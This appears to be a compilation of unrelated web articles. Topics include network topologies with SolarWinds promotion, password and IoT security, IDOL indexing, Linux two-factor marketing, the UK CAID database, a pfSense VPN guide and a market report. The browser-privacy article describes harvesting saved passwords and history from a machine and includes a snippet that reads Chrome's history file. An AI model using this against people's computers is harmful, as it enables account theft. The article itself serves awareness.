Furthermore, data is “half-duplex,” which means it can’t be sent in two opposite directions at the same time, so this layout is not the ideal choice for networks with huge amounts of traffic.
What Is Ring Topology? Single vs. Dual
Ring topology is where nodes are arranged in a circle (or ring). The data can travel through the ring network in either one direction or both directions, with each device having exactly two neighbors.
Pros of Ring Topology
Since each device is only connected to the ones on either side, when data is transmitted, the packets also travel along the circle, moving through each of the intermediate nodes until they arrive at their destination. If a large network is arranged in a ring topology, repeaters can be used to ensure packets arrive correctly and without data loss.
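To make the hop-by-hop travel concrete, here is a minimal sketch (node names are hypothetical) counting the intermediate hops a frame makes travelling one direction around a ring:

```python
# Toy unidirectional ring: frames travel clockwise through each neighbor.
ring = ["A", "B", "C", "D"]  # hypothetical nodes in circular order

def deliver(src, dst):
    """Number of hops a frame takes travelling one direction around the ring."""
    i, j = ring.index(src), ring.index(dst)
    return (j - i) % len(ring)

print(deliver("A", "C"))  # 2 hops clockwise
print(deliver("C", "A"))  # 2 hops: wraps around through D
```

The wrap-around in the second call is why a single failed node or link can cut off delivery in a single ring.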
Only one station on the network is permitted to send data at a time, which greatly reduces the risk of packet collisions, making ring topologies efficient at transmitting data without errors.
By and large, ring topologies are cost-effective and inexpensive to install, and the intricate point-to-point connectivity of the nodes makes it relatively easy to identify issues or misconfigurations on the network.
Cons of Ring Topology
Despite these strengths, a ring topology is still vulnerable to failure without proper network management. Since data transmission moves unidirectionally between nodes along each ring, if one node goes down, it can take the entire network with it. That’s why it’s imperative for each of the nodes to be monitored and kept in good health. Nevertheless, even if you’re vigilant and attentive to node performance, your network can still be taken down by a transmission line failure.
The question of scalability should also be taken into consideration. In a ring topology, all the devices on the network share bandwidth, so the addition of more devices can contribute to overall communication delays. Network administrators need to be mindful of the devices added to the topology to avoid overburdening the network’s resources and capacity.
Additionally, the entire network must be taken offline to reconfigure, add, or remove nodes. And while that’s not the end of the world, scheduling downtime for the network can be inconvenient and costly.
What Is Dual-Ring Topology?
A network with ring topology is half-duplex, meaning data can only move in one direction at a time. Ring topologies can be made full-duplex by adding a second connection between network nodes, creating a dual ring topology.
Advantages of Dual-Ring Topology
The primary advantage of dual-ring topology is its efficiency: because each node has two connections on either side, information can be sent both clockwise and counterclockwise along the network. The secondary ring can act as a redundant layer and backup, which helps solve many of the disadvantages of traditional ring topology. Dual-ring topologies offer a little extra security, too: if one ring fails within a node, the other ring is still able to send data.
What Is Tree Topology?
The tree topology structure gets its name from how the central node functions as a sort of trunk for the network, with nodes extending outward in a branch-like fashion. However, where each node in a star topology is directly connected to the central hub, a tree topology has a parent-child hierarchy to how the nodes are connected. Those connected to the central hub are connected linearly to other nodes, so two connected nodes only share one mutual connection. Because the tree topology structure is both extremely flexible and scalable, it’s often used for wide area networks to support many spread-out devices.
Pros of Tree Topology
Combining elements of the star and bus topologies allows for the easy addition of nodes and network expansion. Troubleshooting errors on the network is also a straightforward process, as each of the branches can be individually assessed for performance issues.
Cons of Tree Topology
As with the star topology, the entire network depends on the health of the root node in a tree topology structure. Should the central hub fail, the various node branches will become disconnected, though connectivity within—but not between—branch systems will remain.
Because of the hierarchical complexity and linear structure of the network layout, adding more nodes to a tree topology can quickly make proper management an unwieldy, not to mention costly, experience. Tree topologies are expensive because of the sheer amount of cabling required to connect each device to the next within the hierarchical layout.
What Is Mesh Topology?
A mesh topology is an intricate and elaborate structure of point-to-point connections where the nodes are interconnected. Mesh networks can be full or partial mesh. Partial-mesh topologies are mostly interconnected, though a few nodes have only two or three connections, while full-mesh topologies are—surprise!—fully interconnected.
The web-like structure of mesh topologies offers two different methods of data transmission: routing and flooding. When data is routed, the nodes use logic to determine the shortest distance from the source to destination, and when data is flooded, the information is sent to all nodes within the network without the need for routing logic.
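As a sketch of the routing method, a breadth-first search over a hypothetical partial-mesh adjacency list finds the fewest-hop path between two nodes:

```python
from collections import deque

# Hypothetical partial-mesh topology as an adjacency list.
mesh = {
    "A": ["B", "C"],
    "B": ["A", "C", "D"],
    "C": ["A", "B", "E"],
    "D": ["B", "E"],
    "E": ["C", "D"],
}

def shortest_route(graph, source, dest):
    """Return the fewest-hop path from source to dest using BFS."""
    queue = deque([[source]])
    visited = {source}
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node == dest:
            return path
        for neighbor in graph[node]:
            if neighbor not in visited:
                visited.add(neighbor)
                queue.append(path + [neighbor])
    return None  # no route: the mesh is partitioned

print(shortest_route(mesh, "A", "D"))  # ['A', 'B', 'D']
```

Flooding, by contrast, would simply forward the data to every neighbor with no path computation at all, trading bandwidth for simplicity.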
Advantages of Mesh Topology
Mesh topologies are reliable and stable, and the complex degree of interconnectivity between nodes makes the network resistant to failure. For instance, no single device going down can bring the network offline.
Disadvantages of Mesh Topology
Mesh topologies are incredibly labor-intensive. Each interconnection between nodes requires a cable and configuration once deployed, so it can also be time-consuming to set up. As with other topology structures, the cost of cabling adds up fast, and to say mesh networks require a lot of cabling is an understatement.
What Is Hybrid Topology?
Hybrid topologies combine two or more different topology structures—the tree topology is a good example, integrating the bus and star layouts. Hybrid structures are most commonly found in larger companies where individual departments have personalized network topologies adapted to suit their needs and network usage.
Advantages of Hybrid Topology
The main advantage of hybrid structures is the degree of flexibility they provide, as there are few limitations on the network structure itself that a hybrid setup can’t accommodate.
Disadvantages of Hybrid Topology
However, each type of network topology comes with its own disadvantages, and as a network grows in complexity, so too does the experience and know-how required on the part of the admins to keep everything functioning optimally. There’s also the monetary cost to consider when creating a hybrid network topology.
Which Topology Is Best for Your Network?
No network topology is perfect, or even inherently better than the others, so determining the right structure for your business will depend on the needs and size of your network. Here are the key elements to consider:
- Length of cable needed
- Cable type
- Installation and operating cost
- Scalability
Generally, the more cable involved in network topology, the more work it’ll require to set up. The bus and star topologies are on the simpler side of things, both being fairly lightweight, while mesh networks are much more cable- and labor-intensive.
The second point to consider is the type of cable you’ll install. Coaxial and twisted-pair cables both use insulated copper or copper-based wiring, while fiber-optic cables are made from thin and pliable plastic or glass tubes. Twisted-pair cables are cost-effective but have less bandwidth than coaxial cables. Fiber-optic cables are high performing and can transmit data far faster than twisted-pair or coaxial cables, but they also tend to be far more expensive to install, because they require additional components like optical receivers. So, as with your choice of network topology, the wiring you select depends on the needs of your network, including which applications you’ll be running, the transmission distance, and desired performance.
As I’ve mentioned, the installation cost is important to account for, as the more complex network topologies will require more time and funding to set up. This can be compounded if you’re combining different elements, such as connecting a more complex network structure via more expensive cables (though using fiber-optic cables in a mesh network is overdoing it, if you ask me, because of how interconnected the topology is). Determining the right topology for your needs, then, is a matter of striking the right balance between installation and operating costs and the level of performance you require from the network.
The last element to consider is scalability. If you anticipate your company and network expanding—or if you’d like it to be able to—it’ll save you time and hassle down the line to use an easily modifiable network topology. Star topologies are so common because they allow you to add, remove, and alter nodes with minimal disruption to the rest of the network. Ring networks, on the other hand, have to be taken entirely offline for any changes to be made to any of the nodes.
How to Map Network Topology
When you’re starting to design a network, topology diagrams come in handy. They allow you to see how the information will move across the network, which, in turn, allows you to predict potential choke points. Visual representation makes it easier to create a streamlined and efficient network design, while also acting as a good reference point if you find yourself needing to troubleshoot errors.
A topology diagram is also essential for having a comprehensive understanding of your network’s functionality. In addition to assisting with the troubleshooting process, the bird’s-eye view provided by a topology diagram can help you visually identify the pieces of the infrastructure your network is lacking, or which nodes need monitoring, upgrading, or replacing.
The good news is you don’t have to do it manually: you can easily create a map of your network topology with tools.
What Tools Help Manage and Monitor Networks?
There are a few network topology mapping products on the market. One of the more common ones is Microsoft Visio, which lets you “draw” your network by adding different nodes and devices to a canvas-like interface. While this can work for smaller networks, drawing each additional node quickly becomes unwieldy if you’re working with a multitude of devices and topologies spread across an entire company. Other options, like Lucidchart and LibreOffice Draw, are either free or offer free trials, and while they’re viable options, especially if the cost is a concern, they don’t come with a full set of premium network mapping tools to make managing a network easier and less time-consuming.
Due to variations in network topology and the different ways networks can behave—including their unique security issues, pressure points, and management challenges—it’s often useful to automate configuration and management tasks using network software.
First, consider using a network configuration management tool. This kind of tool can help you configure your network correctly and automate repetitive tasks to take the pressure off the network administrator. As your organization or network grows, the network topology may become more layered or more complex, and it can become harder to deploy configurations across the entire network with certainty. However, with configuration management tools, the complicated network topology is no issue: tools can usually auto-detect each node on the network, allowing you to deploy standard configurations that may be required for compliance reasons, or flag any configurations outside what is expected.
Network configuration management tools can also highlight vulnerabilities, so you can correct these issues and keep your network more secure. Finally, these kinds of tools should also display the lifecycle of the devices on your network, alerting you to devices coming to their end-of-service or end-of-life points, so you can replace them before problems begin to arise.
Network Performance Troubleshooting
You should use network management software to track overall performance. A performance manager can keep track of network issues, outages, and performance issues. A performance management tool will also have the functionality to set network performance baselines and establish a clear picture of how your network typically behaves when healthy. Then, by setting alerts when your network performs unexpectedly or outside of these baselines, you can quickly track, pinpoint, and troubleshoot issues.
With complex network topologies, it may be hard to figure out exactly which part of the network is having issues. Some performance managers will create a visual display of your network topology, so you can see the entire network in a one-map overview. This can show you how your network is laid out, bring your attention to changes in the topology, and flag where problems are arising. To get started understanding your network topology, you can try a tool like Network Topology Mapper free for 14 days. This tool automatically discovers and generates detailed topology maps of your network and can create multiple map types without having to rescan your network every time.
That’s one reason I really like SolarWinds Network Topology Mapper (NTM). No matter the size of your network, it can not only automatically discover all the devices and create a diagram of your network topology for you, but also populate the map with industry-specific icons for easy visual differentiation. In addition to the auto-discovery feature, the software offers an intuitive network wizard so you can drag and drop nodes and node groups (which you can also customize). Visualizing the various connections between nodes in a single map or diagram can be cumbersome, especially if you’re working with an expansive wide area network, but the interface in NTM lets you sort through different layers of connections, depending on the level you’re trying to inspect.
You can configure NTM to periodically rescan your network to keep your diagrams up to date. It integrates easily with other programs, and it offers a robust reporting system so you can track metrics, from device inventory to network performance, all while helping keep you PCI compliant.
Topology Mapping for Managed Services Providers
Topology mapping isn’t just important for managing a single network. It’s also a key aspect of managed services providers’ (MSPs’) essential duties—for hundreds or even thousands of different customers across multiple networks.
Due to the specific needs of MSPs, it often isn’t enough to use the same tool you might use for your personal or company network. It’s worth noting that another SolarWinds MSP (currently N-able) product, N-central®, has a specialized tool for this use case.
The N-central network topology mapping solution enables you to perform in-depth assessments of the networks you manage. You can perform on-demand and scheduled scans, as well as get access to detailed data represented in a clear, visual way.
What to Know About Network Topology Today
The best advice I can give regarding network topology is that you should be deeply familiar with the needs and usage requirements of your network. The total number of nodes on the network is one of the primary considerations to account for, as this will dictate whether it’s feasible to use a simpler topology, or whether you’ll have to make the investment in a more complicated network structure.
As I mentioned earlier, no one topology is “best.” Each offers its own set of perks and drawbacks, depending on the network environment you’re working with or attempting to set up. For this reason, I would avoid jumping to immediate conclusions about any of the network topologies based solely on the descriptions here. Before deciding, try using a network topology mapping tool to sketch the layout you’re thinking about using. Network Topology Mapper, my personal favorite, lets you plot the entire structure of your network in a way that’s both easy to use and easy to parse, and it offers a 14-day free trial. | <urn:uuid:e714230d-6567-4234-a360-e29a68544677> | CC-MAIN-2022-40 | https://www.dnsstuff.com/what-is-network-topology | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00754.warc.gz | en | 0.923674 | 4,911 | 3.359375 | 3 |
If you are in charge of network security, one policy worth laying down to safeguard your network is the regular change of user passwords, since passwords that can be easily guessed give potential hackers and crackers a simple way in.
For some users, it is easy to figure out their passwords. The normal passwords that people use include:
1. Car Plate Numbers
2. Mobile Phone Numbers
3. Adding 123 to their names, or
4. Using “PASSWORD” as their password
The number of potential combinations grows with the length of the password, which is why longer passwords (at least 8 alphanumeric characters) are encouraged for users who access the network.
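To see why length and a larger character set matter, here is a rough sketch of brute-force search-space sizes:

```python
# Rough password search-space sizes a brute-force attacker must cover.
def search_space(alphabet_size, length):
    return alphabet_size ** length

digits = 10  # e.g. a password that is just a mobile phone number
alnum = 62   # a-z, A-Z, 0-9

print(f"{search_space(digits, 8):,}")  # 100,000,000
print(f"{search_space(alnum, 8):,}")   # 218,340,105,584,896
```

An 8-character alphanumeric password has over two million times as many possibilities as an 8-digit number, which is why the common choices listed above are so weak.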
While guessing and cracking attacks can succeed in many ways, enforcing a regular schedule for changing passwords is an effective safeguard against hackers and other malicious people gaining lasting access to the network and the programs in use.
One cannot avoid the fact that curiosity and the desire for recognition are the main reasons some people become hackers or code crackers. This is evident in people who are looking to try out their skills without thinking of the outcome, which can cause a lot of problems.
So one good way to avoid being hacked is to think like a hacker. Once you do, design security policies that would make it hard for you, in that mindset, to breach the system. That is the best way to stay effective in your line of duty in any organization.
IoT has quickly changed how we think of the Internet. Those who grew up with the Internet might still think of browsers on client systems like laptops and desktops pulling down websites hosted on servers. But today, Internet usage has evolved considerably from that point. We’re watching movies on the streaming app built into our televisions. Voice-enabled home assistants play music and pull up stock quotes on demand. Vast arrays of solar panels are installed at industrial-scale with all kinds of instrumentation built-in to allow for operations and maintenance with minimal human intervention. The benefits of this revolution are seen across the economy, fueled by new, innovative use cases with emerging and cheap distributed manufacturing driving costs down.
Desktop computing followed a similar path some decades ago, with successive generations of processors and cheaper memory enabling gains across broad swathes of society. But relative to IoT, it followed a measured pace. Even as the people producing the hardware and the applications were making steady progress, there was another set who recognized that this provided a parallel opportunity – for them to use this technology to inflict harm on others while enriching themselves. This has led to the many years of network infiltrations, data breaches, and destructive attacks that we’re now hearing about non-stop. For the most part, this has happened in environments based on traditional computing devices like servers and laptops.
As we enter the IoT era, we have to contemplate how the widespread presence of new kinds of devices that include some form of computing and network connectivity might impact the threat landscape.
Mirai, a popular malware family responsible for numerous high-profile DDoS attacks since 2016, has been ported to at least 17 separate IoT architectures. This means that once an adversary has access to an IoT device, odds are there’s already malware ready to be installed.
And gaining such access keeps getting easier. Many IoT devices run with known vulnerabilities, making them easy to compromise as long as they are reachable on the Internet. One report cites the ECHOBOT family, which carries 71 separate exploits for a wide array of devices.
Even if these devices ship without known vulnerabilities in the first place, not many have a software update mechanism of any sort, so they’re almost destined to be vulnerable at some point as the underlying software ages.
This is true globally, and adversaries take advantage of common credentials that ship on devices in specific regions.
Will IoT ever see a moment where it takes a big leap forward in terms of security? Think about when Windows XP Service Pack 2 arrived and provided a huge step forward over previous generations of software that just weren't ready for the Internet. Can there be such a big-leap moment for IoT?
For many reasons, this seems like a long shot. The IoT ecosystem is vast, and there are many separate entities responsible for parts of the process, from the time a device is conceived to when it gets installed on a network. One huge problem is that end-users bear the brunt of the insecurity baked into the ecosystem with few consequences for other entities in the chain.
And end users bear quite the brunt. There have been multiple times in recent years when attacks have occurred that struck at the core of the Internet's stability. IoT is a jumping-off point for many intrusion campaigns. And the reports of large-scale vulnerabilities keep coming. In the past month, the Treck TCP/IP stack has had a set of 19 separate vulnerabilities reported, with little chance that devices incorporating the software will ever be updated.
What should we do to fix this? Unfortunately, there are no easy answers.
Standards will have to be created and enforced around the basic design of such devices. Secure access, updates, and obsolescence have to be factored in from the beginning. Consumers will need education on topics, such as the safe deployment and use of their devices. Service providers will need to run containment operations when large attacks break out. Governments have to hold all these entities accountable. Every one of these entities will need to play their part if we are to get anywhere.
As a society, we have to recognize the role of the intelligent adversary, who will adapt to these changes as they are introduced. In many instances, even as we progress in the security of devices we have deployed, the adversary may also make significant gains in their ability to exploit vulnerable devices to their ends.
As the IoT revolution brings changes to society, it is introducing new classes of risk. It's up to us to make sure these risks are understood and mitigated if we are to reap the full benefits of the revolution.
After IDOL Server has processed the tokens to remove any that you do not want to index, it indexes the remaining tokens. During this process, it modifies the tokens to make it easier to return the correct documents. This involves the following processes:
Stemming
In many languages, a related set of words have a common root. For example, help, helping, helpful and helped, all stem from the common root help. You can reduce words to their common root without losing meaning.
The IDOL stemming algorithm reduces all words to their stem, and indexes the stem. This process allows you to search for a word, and return documents with related concepts that do not specifically include that word.
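The idea can be illustrated with a toy suffix-stripper. This is only a sketch: IDOL's real stemming algorithm is language-specific and far more sophisticated, and the suffix list below is invented for illustration.

```python
# Hypothetical suffix list for illustration only; a production stemmer
# (such as IDOL's) uses per-language rules and exception handling.
SUFFIXES = ("ing", "ful", "ed", "s")

def crude_stem(word: str) -> str:
    """Strip the first matching suffix so related word forms share one index term."""
    for suffix in SUFFIXES:
        # Require a reasonable remaining stem length to avoid over-stripping.
        if word.endswith(suffix) and len(word) > len(suffix) + 2:
            return word[: -len(suffix)]
    return word

# help, helping, helpful, helped, and helps all reduce to the stem "help",
# so a query on any one form can match documents containing the others.
```
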
Character Normalization

In some languages, there is more than one way to represent a character. For example:
the Roman alphabet has uppercase and lowercase forms of all letters.
the Japanese katakana script can have full width or half width characters.
the Chinese language has two scripts, usually known as Chinese Traditional and Chinese Simplified.
IDOL Server uses canonicalization to ensure that it treats all character forms equally. It automatically converts to an internationally recognized canonical form. Retrieval then matches all versions of a character.
Character normalization is controlled by the same configuration settings as Transliteration.
Transliteration

Transliteration is like Character Normalization in that it aims to map sets of characters to a standard form, so that a search for one form matches documents containing any of those forms. An important example is the removal of accents from letters, so that a search for cafe matches documents containing café, and the reverse. Similarly, the German letter ß is transliterated to ss.
Transliteration schemes differ by language. For example in German, the letter ö transliterates to oe, whereas in Swedish it transliterates to o. Several languages that use non-Roman scripts can also be transliterated to Roman. For example in Russian, IDOL transliterates Владимир to Vladimir. For details of the transliteration schemes used, see Transliteration Tables.
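A rough sketch of accent-stripping transliteration, using Unicode decomposition plus an explicit mapping for letters such as ß that do not decompose. This is not IDOL's implementation, and it cannot model language-specific rules such as German ö → oe versus Swedish ö → o.

```python
import unicodedata

# Letters whose transliteration is not recoverable from Unicode
# decomposition; this small table is illustrative, not exhaustive.
SPECIAL = {"ß": "ss"}

def transliterate(text: str) -> str:
    """Map accented characters to plain ASCII equivalents."""
    text = "".join(SPECIAL.get(ch, ch) for ch in text)
    # NFKD splits characters like é into a base letter plus a combining
    # accent; dropping the combining marks leaves the plain letter.
    decomposed = unicodedata.normalize("NFKD", text)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))
```

With this sketch, `transliterate("café")` returns `cafe` and `transliterate("Straße")` returns `Strasse`.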
When you have multiple languages in your server, Micro Focus recommends setting this parameter to True. See Cross-Lingual Search.
Transliteration affects only the characters used to represent a word. IDOL Server does not translate terms from one language to another.
Turn Transliteration Off
Several languages have unusual linguistic behavior, such that even if you set the transliteration parameter to False for that language, some characters are still transliterated. To prevent all transliteration, set the option globally, and then set it to False in the individual language sections.
If you’re running any form of business, there’s a likely chance that you’re using a flavor of the Linux operating system in one way or another. Linux runs on millions of servers, personal computers and IoT devices, and for the most part, these devices are configured to be accessed and administered remotely. In organizations, Linux servers are tasked with running critical functions and storing sensitive information, which means protecting them from unauthorized access is of paramount importance.
But in most cases, devices running the Linux operating system are protected with nothing more than a username and password. And as it’s becoming increasingly evident, in the age of low-cost supercomputing and ubiquitous connectivity, passwords aren’t enough to protect your computer and devices from unwanted access.
With the right tools, a little patience, and an internet connection, hackers will be able to break into your organization’s Linux machines either by running brute-force and dictionary attacks or by staging phishing scams and stealing your password. And from there, anything can happen.
One of the best ways to prevent uninvited parties from accessing your Linux machines is to enable two-factor authentication (2FA). 2FA adds a layer of security to your Linux by requiring users to present an additional token aside from passwords when trying to login. This will prevent attackers from accessing a machine by stealing or cracking a password.
What are the 2FA options for Linux?
Some of the more popular 2FA mechanisms are physical keys and one-time passwords (OTPs) sent to a phone number or generated by a mobile app. Linux currently supports Google Authenticator, a mobile application that provides OTPs during the login process.
When activating support for the Google Authenticator app on Linux, users are given a secret code that they use to link their phone to their account. Afterwards, when logging in or entering a sudo command, the user will be prompted for their password and a one-time password that appears on the associated phone. OTPs expire after a certain amount of time passes and after they’ve been used.
This 2FA method helps improve user account security on Linux user accounts and makes it considerably harder for cybercriminals to gain unwanted access to a Linux machine. However, it has some distinct drawbacks. First, it requires users to enter two passwords, which most users find annoying. The process can also be tedious when you want quick access to your account. Second, the 2FA mechanism relies on a single channel to generate its OTP, which makes it prone to hacks. Should the passcode be intercepted or cloned, or if the secret code is discovered and installed on a second phone, a malicious user will be able to access the Linux account.
Secret Double Octopus two-factor authentication for Linux
In contrast to traditional OTP-based solutions, the Octopus authenticator is both frictionless and more secure. The Secret Double Octopus solution provides users with a mobile app that delivers push notifications for login attempts.
When Secret Double Octopus is activated on a Linux account, all the user needs to do is accept or reject the request with a tap on the associated mobile device. There’s no need to type a second password on the terminal.
Moreover, Secret Double Octopus uses a multichannel security mechanism to increase the security of the two-factor authentication. Request codes are generated across several different channels and sent to the phone, making them much harder to intercept or reproduce. This makes cloning and man-in-the-middle attacks virtually impossible.
The Child Abuse Image Database (CAID) is the United Kingdom’s national system used by law enforcement to help fight the growing problem of Child Sexual Abuse Material (CSAM). The system helps police detect, flag and analyse illegal digital media images.
In 2012, the UK's Operation Yewtree commenced. The operation started as an investigation by the Metropolitan Police Service into sexual abuse allegations, primarily concerning the abuse of children. It swiftly became a full criminal investigation that led to what is called the "Yewtree effect," which is credited with an increase in the number of reported sex crimes in the UK. Between then and 2017, nearly 70,000 child sexual abuse offences were recorded in the UK. This number, sadly, is up 24% from prior years.
Enter CAID, the Child Abuse Image Database for UK law enforcement. CAID is a secure database of illegal images and videos of child exploitation, used by UK law enforcement to help identify both victims and perpetrators of child exploitation.
Technologically savvy, CAID has the tools for facial, object, and relationship mapping. Through the use of CAID, UK Law Enforcement works collaboratively and is able to streamline forensic reports.
The increase in child sexual offences is unfortunately a sign of the times. Technology is making it easier for abusers, not harder. According to CAID, the Internet makes it easier for abusers to connect with their victims, promotes a sense of anonymity, makes it easier for perpetrators to access and share images and video of abuse, and increases the possibility of sharing images being an international crime.
In the fight against such abuses, CAID is a necessary tool. It works by bringing together all of the images that both the police and the National Crime Agency encounter, and uses their unique identifiers (hashes) and metadata to improve investigations. Digital forensic tools like ADF software collect and analyze hash data such as that CAID provides to create readily made reports for prosecutors to assist in child exploitation cases.
CAID was created in conjunction with the police, industry partners, and alongside British Small and Medium Sized Enterprises (SMEs) in 2014. Since then, CAID has helped streamline investigations and prosecution of offenders. CAID hashes are used in forensic triage for early assessment to help police prioritize which of the suspect’s devices require further analysis.
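At its core, hash-based triage is simple set membership: hash each file on a seized device and check it against the database, flagging known material without an examiner having to view it. A minimal sketch; CAID's actual hash types and matching pipeline are more involved, and the SHA-1 choice here is illustrative.

```python
import hashlib

def triage(files: dict[str, bytes], known_hashes: set[str]) -> list[str]:
    """Flag any file whose SHA-1 digest appears in a known-material hash set."""
    flagged = []
    for name, data in files.items():
        digest = hashlib.sha1(data).hexdigest()
        if digest in known_hashes:
            flagged.append(name)
    return flagged
```

Because the comparison is against precomputed hashes rather than image content, triage can run quickly on-site and prioritize which devices need full forensic analysis.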
ADF Software works internationally with both Project VIC and CAID hashes to triage on-site, speeding investigations and helping prosecutors get perpetrators off the streets as soon as possible.
Everybody knows by now that websites collect information about users’ location, visited pages, and other data that can help them improve or monetize the experience.
But just a small minority of Internet users realizes that browsers also collect/store information that can help attackers compile a “Web dossier” to be used for future attacks.
“An attacker could compile a list of applications you commonly log into from your URL history, including work applications and personal finance sites. Criminals can learn who in a company has access to the financial or payroll application, for example, and compile a list of usernames to use to break in. Knowing what applications are in use at a company can help an attacker craft more convincing phishing emails to try and trick users into exposing their passwords, which the attacker could then harvest,” explains Ryan Benson, a threat researcher at Exabeam.
By accessing users’ URL history, an attacker can learn about their personal interests, and use that information to guess their passwords or blackmail them (if the interest is controversial or illegal). Also, usernames and passwords saved in the browser’s password manager can be extracted and used to compromise a wide variety of accounts.
What kind of information does your browser store?
Exabeam’s researchers have performed two tests:
- One with Firefox and OpenWPM, a privacy measurement framework built on Firefox. They visited the 1,000 most popular sites on the Internet without logging in, just navigating to three links on each of the websites.
- A second one with Chrome. They visited a subset of popular sites (Google Search, Drive, and Mail; YouTube; Facebook; Reddit; Yahoo; Amazon; Twitter; Microsoft's Outlook and OneDrive; Instagram; Netflix; LinkedIn; Apple; WhatsApp; PayPal; GitHub; Dropbox; and the IRS site), created accounts, logged in, and performed a relevant action.
In the first test, they found that 56 websites stored some level of geolocation information (via cookies) about the user on their local system, and 57 recorded a user’s IP address.
In the second test, they found that much potentially sensitive information is stored by popular services into the browser: account usernames, associated email addresses, search terms, titles of viewed emails and documents, downloaded files, viewed products, names, physical addresses, and more. And, if the in-browser password manager is on, sensitive credentials are stored and can be accessed by crooks that manage to compromise your computer.
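Much of this data sits in ordinary SQLite files on disk. For example, Chrome's browsing history lives in a file named History; assuming its usual `urls` table layout (url, title, and visit_count columns, which is an assumption about Chrome's schema rather than a documented API), a few lines of Python can list a user's most-visited sites. Copy the file first, since the browser locks it while running.

```python
import sqlite3

def top_visited(history_db: str, limit: int = 5):
    """Return the most-visited URLs from a copy of Chrome's History SQLite file."""
    con = sqlite3.connect(history_db)
    try:
        return con.execute(
            "SELECT url, title, visit_count FROM urls "
            "ORDER BY visit_count DESC LIMIT ?",
            (limit,),
        ).fetchall()
    finally:
        con.close()
```

The ease of this query is exactly the point: anyone with read access to the profile directory can reconstruct a user's browsing habits in seconds.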
“Creating malware to harvest information stored in a browser is quite straightforward, and variants have been around for years, including the Cerber, Kriptovor, and CryptXXX ransomware families,” Benson noted.
“The free NirSoft tool WebBrowserPassView dumps saved passwords from Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. While ostensibly designed to help users recover their own passwords, it can be put to nefarious use.”
Collecting this data is especially easy to do on shared computers. “If a machine is unlocked, extracting browser data for analysis could be done in seconds with the insertion of a USB drive running specialized software or click of a web link to insert malware,” he says.
Once collected, all this data can be used to map a user’s work hours, habits, interests, locations, online use and accounts, the type of devices he or she uses, and so on.
Preventing data collection
All this information is collected via things like browsing history and bookmarks, HTTP and HTML5 cookies, saved login info (via in-browser password managers), and the autofill option.
For those users who would prefer browsers not to store this information, there are many options, but each has some cons.
For example, disabling HTTP cookies means that many websites will have issues, especially if a user needs to log in. Disabling autofill means you'll need to retype common information on websites over and over again. Using a third-party password manager is good, but there is no guarantee that the software doesn't have vulnerabilities and, if it's cloud-based, you are still sending password information off to a third party and trusting that it is secure and confidential.
In general, the best option is to browse in incognito mode. This means that few local artifacts are saved from a session for local attackers to exploit, but you'll also get no site customization or saved logins.
The setup for this is done in three parts and since there are many videos on two of the parts, I will simply include those videos.
Part 1: Setup PIA VPN on your pfSense. You have to have this completed and established before you can create firewall rules for routing your OpenVPN connections through this for Internet traffic. Please note, this is for PIA VPN and no others. You will have to do your own research on how to setup other VPNs with your pfSense.
Tom’s Video: https://www.youtube.com/watch?v=ov-xddVpxhc
Part 2: Setup OpenVPN on your pfSense. Again, Tom has a great in-depth video showing how to accomplish this.
Tom’s Video: https://www.youtube.com/watch?v=7rQ-Tgt3L18
Part 3: This is where you create a firewall rule on your PIAVPN interface. Add the rule as shown in the Figure. You can ignore all the rules except the bottom one. IMPORTANT: Change the gateway to your PIAVPN Outbound one and not your WAN gateway. You can do this while creating the rule and the option is midway down the rule screen, see Figure.
I statically map every device on my network. It makes making aliases very easy. You should do this for any device you plan on adding to this next step for creating an alias.
Create an alias. I call mine VPN_Use (see Figure). Enter any device that you want to use the PIA VPN. This includes your OpenVPN connections. For example, if you get assigned a remote IP of 192.168.100.2 by your OpenVPN server, add that address to this alias.
Next, go into each firewall rule for each interface, including your OpenVPN Interface. If you don’t ever plan on using PIAVPN on a particular interface, then you don’t need this step. For me, I have various devices across my IoT, LANNET, OpenVPN, and Server (for virtual machines), that I want to use PIAVPN.
Rule order is important, so make sure you get the rules correct by doing a lot of testing. Add the two rules circled in RED in the Figure FOR EACH interface. Again, make sure the allow rule uses the PIAVPN gateway and the kill-switch rule blocks traffic out the WAN. You don't need the kill switch, but if you are worried about the devices in your alias not using the VPN, then you should keep this rule too.
I hope this helps most people who are interested in this type of setup. I will try to answer questions as they come up, but please make sure you follow the proper setup for getting both OpenVPN and PIA VPN working independently BEFORE doing this.
The global liquid nitrogen cryopreservation market recorded revenue of US$1,805.5 Mn in 2020 and is expected to grow at a CAGR of 12.5% over the analysis period of 2021 to 2028.
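For reference, compounding the 2020 base at that CAGR gives the implied 2028 market size. This is a back-of-the-envelope projection from the two figures above, not a figure taken from the report.

```python
def project(value_mn: float, cagr: float, years: int) -> float:
    """Compound a base value forward: value * (1 + CAGR) ** years."""
    return value_mn * (1 + cagr) ** years

# US$1,805.5 Mn in 2020 compounded at 12.5% over the 8 years 2021-2028
# gives roughly US$4,632.5 Mn, i.e. about US$4.63 Bn by 2028.
implied_2028 = project(1805.5, 0.125, 8)
```
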
The Journal of Fertilization: In Vitro - IVF-Worldwide, Reproductive Medicine, Genetics & Stem Cell Biology describes liquid nitrogen as a substance produced through an industrial process using fractional distillation. Liquid nitrogen is a cryogenic fluid required for in-vitro reproductive technologies, which are widely used in human IVF, in-vitro embryo production for the cattle industry, and livestock breeding.
Rising number of government initiatives for the preservation of stem cells fosters the growth of the global market
The National Cord Blood Program (NCBP), established in 1992, examines cord blood as a public health resource for identifying suitable hematopoietic transplants for patients who do not have a matching bone marrow donor. NCBP freezes and stores cord blood units in liquid nitrogen so that they can be shipped as needed. In 2011, the Canadian Department of Health established Canada's first publicly funded national umbilical cord blood bank, which accepts donations for allogeneic hematopoietic stem cell transplantation. Furthermore, the UK Stem Cell Bank, which is sponsored by the UK Medical Research Council and the Biotechnology and Biological Sciences Research Council, is a quality-controlled, ethically approved repository for human embryonic, fetal, and adult stem cell lines. The UK Stem Cell Bank has distributed human cell lines to Sheffield University for use in medical trials and research. Storage and preservation of stem cells, bone marrow cells, fetal tissue, and sperm require extremely low temperatures, making liquid nitrogen the most suitable option. These factors will have a positive impact on the overall growth of the global liquid nitrogen cryopreservation market.
High risks associated with handling liquid nitrogen cryopreservation equipment limit the growth of the global market
